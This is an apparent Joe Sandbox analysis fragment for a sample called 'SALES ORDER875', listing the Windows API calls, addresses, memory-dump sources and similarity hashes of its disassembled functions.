                                                                                                                                                                                    • Instruction ID: 9d94a0e41049236cafcf2f16bb672f9673e3988db62c55e630e0b0eaf4166818
                                                                                                                                                                                    • Opcode Fuzzy Hash: 441f210978063201eec06e86efb41fd356649d89a3015ab2cdf3b0779b2c34bc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C314C7195430EAFDB21DFA5CA84ABBBBF9EB14350B10842EF616D6141DB30AE40DB60
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 003E1915
                                                                                                                                                                                    • PostMessageW.USER32(00000001,00000201,00000001), ref: 003E19C1
                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?), ref: 003E19C9
                                                                                                                                                                                    • PostMessageW.USER32(00000001,00000202,00000000), ref: 003E19DA
                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?), ref: 003E19E2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3382505437-0
                                                                                                                                                                                    • Opcode ID: 775e582bd544eca1a64f4777e65c1c8f885738e0def5bc7b3a880662c230248a
                                                                                                                                                                                    • Instruction ID: e5207f432524bd5b444bb9d661e65876a54ac0d5cf0cc580136d880074cd6c5f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 775e582bd544eca1a64f4777e65c1c8f885738e0def5bc7b3a880662c230248a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C31A271900269EFCB04CFA9CD99ADE7BB5EB44315F108325F921AB2D1C7709954DB90
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00415745
                                                                                                                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 0041579D
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 004157AF
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 004157BA
                                                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00415816
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$_wcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 763830540-0
                                                                                                                                                                                    • Opcode ID: 2c20a2c7c9ec9de6acff40de338b9b380b74279e24e89482bf4f8c3c8c5100e0
                                                                                                                                                                                    • Instruction ID: f3aed681a32e59457c4cce38ec6baacbd53063d4ca714b2e27df5d58bd2aed6f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c20a2c7c9ec9de6acff40de338b9b380b74279e24e89482bf4f8c3c8c5100e0
                                                                                                                                                                                    • Instruction Fuzzy Hash: A9218175904618DADB209F60CC85BEE77B8FF84324F108217E929EA2C0D77889C5CF55
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsWindow.USER32(00000000), ref: 00400951
                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00400968
                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 004009A4
                                                                                                                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 004009B0
                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 004009E8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4156661090-0
                                                                                                                                                                                    • Opcode ID: 976b35bc5cdf7290523fe428927aafcc08135ee4aab51963bf91c2ccec262551
                                                                                                                                                                                    • Instruction ID: ec2b2127ad21f1fc65ae791548148a503edc619c712e300e2e94510b1b54910d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 976b35bc5cdf7290523fe428927aafcc08135ee4aab51963bf91c2ccec262551
                                                                                                                                                                                    • Instruction Fuzzy Hash: C1218175600204AFD704EF65DD84AAEBBE5EF45700F048079E94AAB362CB74AC04CB90
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 003BCDC6
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003BCDE9
                                                                                                                                                                                      • Part of subcall function 003B3820: RtlAllocateHeap.NTDLL(00000000,?,00451444,?,0039FDF5,?,?,0038A976,00000010,00451440,003813FC,?,003813C6,?,00381129), ref: 003B3852
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 003BCE0F
                                                                                                                                                                                    • _free.LIBCMT ref: 003BCE22
                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003BCE31
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 336800556-0
                                                                                                                                                                                    • Opcode ID: c880cc86b096fd1dc4fea3cc409159b6fd52cd10c0dc9b3830d68b684ecdb57f
                                                                                                                                                                                    • Instruction ID: b8ef282e626a51fd0c2b31c3415cc03b71a821d753816cc573553d3b6e9523bd
                                                                                                                                                                                    • Opcode Fuzzy Hash: c880cc86b096fd1dc4fea3cc409159b6fd52cd10c0dc9b3830d68b684ecdb57f
                                                                                                                                                                                    • Instruction Fuzzy Hash: A801FC72B11215BF633316766C8CCFB796DDEC6BA63155129FF05CB500DA60CD0181B4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00399693
                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 003996A2
                                                                                                                                                                                    • BeginPath.GDI32(?), ref: 003996B9
                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 003996E2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3225163088-0
                                                                                                                                                                                    • Opcode ID: d04e6ca1a3f4dc3cb5db1e9cb4e8ba11decfe0a4862ec509de1c7524603b8a9e
                                                                                                                                                                                    • Instruction ID: 283b7cc658485f9ba79b06a16ab62022c189b2700fa2503928544cc1fa0284a1
                                                                                                                                                                                    • Opcode Fuzzy Hash: d04e6ca1a3f4dc3cb5db1e9cb4e8ba11decfe0a4862ec509de1c7524603b8a9e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 17215EB1802305EFDF129F68EC587E93BA9BB51366F11422BF411A61B2D3709891CF98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _memcmp
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2931989736-0
                                                                                                                                                                                    • Opcode ID: 90cafb947b5050034bb44d042a24b62df208eb0c4e9aa5e7eb4b054fd837d797
                                                                                                                                                                                    • Instruction ID: e72efa07bbb36c8fbd9d28d3ebb3f7d9736228b4cfc49feb52cb46f5f726c6e7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 90cafb947b5050034bb44d042a24b62df208eb0c4e9aa5e7eb4b054fd837d797
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E01F5B6241A29FBD60A99129D82FFB735CEB31398F100121FD049E6C1F760FD6582E4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,003AF2DE,003B3863,00451444,?,0039FDF5,?,?,0038A976,00000010,00451440,003813FC,?,003813C6), ref: 003B2DFD
                                                                                                                                                                                    • _free.LIBCMT ref: 003B2E32
                                                                                                                                                                                    • _free.LIBCMT ref: 003B2E59
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00381129), ref: 003B2E66
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00381129), ref: 003B2E6F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                    • Opcode ID: 2c197dfeb863d289aaf4497d17113fa7e95e248a8ad0c1e61f7961802170a22b
                                                                                                                                                                                    • Instruction ID: bcef6b2ad3bf1313f50875db22c1d2820a1013d6943474a5cee3d0a7fa4c708a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c197dfeb863d289aaf4497d17113fa7e95e248a8ad0c1e61f7961802170a22b
                                                                                                                                                                                    • Instruction Fuzzy Hash: F201283628560077C6136736AC85DEB266DABC63BEB264738FB25A6DD3EF34CC014024
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,003DFF41,80070057,?,?,?,003E035E), ref: 003E002B
                                                                                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003DFF41,80070057,?,?), ref: 003E0046
                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003DFF41,80070057,?,?), ref: 003E0054
                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003DFF41,80070057,?), ref: 003E0064
                                                                                                                                                                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003DFF41,80070057,?,?), ref: 003E0070
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3897988419-0
                                                                                                                                                                                    • Opcode ID: c19508c1e828b666177141ab126fa4365e0d4bf2ab55f1997b7b5d6373343912
                                                                                                                                                                                    • Instruction ID: fea8e7fdd0f1d798d0e8f19364e7b0e6d026bd4d498a426bdf7c792ea2798a59
                                                                                                                                                                                    • Opcode Fuzzy Hash: c19508c1e828b666177141ab126fa4365e0d4bf2ab55f1997b7b5d6373343912
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0601A772640214BFDB155F6ADC84BEE7BEDEF44752F148224F905D2250D7B1DD8087A0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 003EE997
                                                                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 003EE9A5
                                                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 003EE9AD
                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 003EE9B7
                                                                                                                                                                                    • Sleep.KERNEL32 ref: 003EE9F3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2833360925-0
                                                                                                                                                                                    • Opcode ID: 9c50fb461b2dc2b9ef5718d70b918c43306725d8267a798bad92879afcac788a
                                                                                                                                                                                    • Instruction ID: 44997644ecb9c138c54f08c68510aa75153cc97889361c3f18befebbd2a1e955
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c50fb461b2dc2b9ef5718d70b918c43306725d8267a798bad92879afcac788a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 79016131C41639DBCF019FE5DC896EDBBB8FF08300F014656E501B2281CB345550CBA5
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 003E1114
                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,003E0B9B,?,?,?), ref: 003E1120
                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,003E0B9B,?,?,?), ref: 003E112F
                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,003E0B9B,?,?,?), ref: 003E1136
                                                                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 003E114D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 842720411-0
                                                                                                                                                                                    • Opcode ID: e32314cb5cf5b7fc64fb513eb040c6ab34ce824ee2999aca58070e8b1ee08bfb
                                                                                                                                                                                    • Instruction ID: 51816d5731d2eee7cef162c0d70bd886d3bf4ae59b86f445ce1d4113495b2071
                                                                                                                                                                                    • Opcode Fuzzy Hash: e32314cb5cf5b7fc64fb513eb040c6ab34ce824ee2999aca58070e8b1ee08bfb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 97018179180315BFDB124FA5DC89EAA3F6EEF85360B114424FA41C3390DB71DC008E60
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003E0FCA
                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003E0FD6
                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003E0FE5
                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003E0FEC
                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003E1002
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                                                                    • Opcode ID: 432f8d683e9ec0fb884d89c3fcf062525ff8c8a80113f48e4ef7275e0dc527cd
                                                                                                                                                                                    • Instruction ID: 0a7364d471de4c34f354352ce7428e07c13c0a27c6d1892d54ba21d593ea3552
                                                                                                                                                                                    • Opcode Fuzzy Hash: 432f8d683e9ec0fb884d89c3fcf062525ff8c8a80113f48e4ef7275e0dc527cd
                                                                                                                                                                                    • Instruction Fuzzy Hash: B7F06239180355FBD7214FA5DC8DF963F6EEF89761F118424F945D7291CA70DC408A60
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003E102A
                                                                                                                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003E1036
                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003E1045
                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003E104C
                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003E1062
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                                                                    • Opcode ID: dae43a3231985e3f3c649aa351a790fb070c7bb0555e08129f0b875b6e86d01e
                                                                                                                                                                                    • Instruction ID: 677b5a228024542969465d1768f3f94241a9d7e2a430f8729830cf188e136bf2
                                                                                                                                                                                    • Opcode Fuzzy Hash: dae43a3231985e3f3c649aa351a790fb070c7bb0555e08129f0b875b6e86d01e
                                                                                                                                                                                    • Instruction Fuzzy Hash: F1F06D39280355FBDB225FA5EC89F963FAEEF89761F124424FA45D7290CA70DC408A60
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,003F017D,?,003F32FC,?,00000001,003C2592,?), ref: 003F0324
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,003F017D,?,003F32FC,?,00000001,003C2592,?), ref: 003F0331
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,003F017D,?,003F32FC,?,00000001,003C2592,?), ref: 003F033E
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,003F017D,?,003F32FC,?,00000001,003C2592,?), ref: 003F034B
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,003F017D,?,003F32FC,?,00000001,003C2592,?), ref: 003F0358
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,003F017D,?,003F32FC,?,00000001,003C2592,?), ref: 003F0365
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                    • Opcode ID: b3178b111c2afa2ad6f9fac4109a32fac7b32c9b4be3aaf6a00c72f2f15d8f61
                                                                                                                                                                                    • Instruction ID: 81499dfef56b31a488b3d95dc16cda4e3caad9f5ac8fc77f56c5c73e8a99bf6d
                                                                                                                                                                                    • Opcode Fuzzy Hash: b3178b111c2afa2ad6f9fac4109a32fac7b32c9b4be3aaf6a00c72f2f15d8f61
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E01A276800B199FC7369F6AD880826F7F5BF503153168A3FD29652932C371A954CF80
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _free.LIBCMT ref: 003BD752
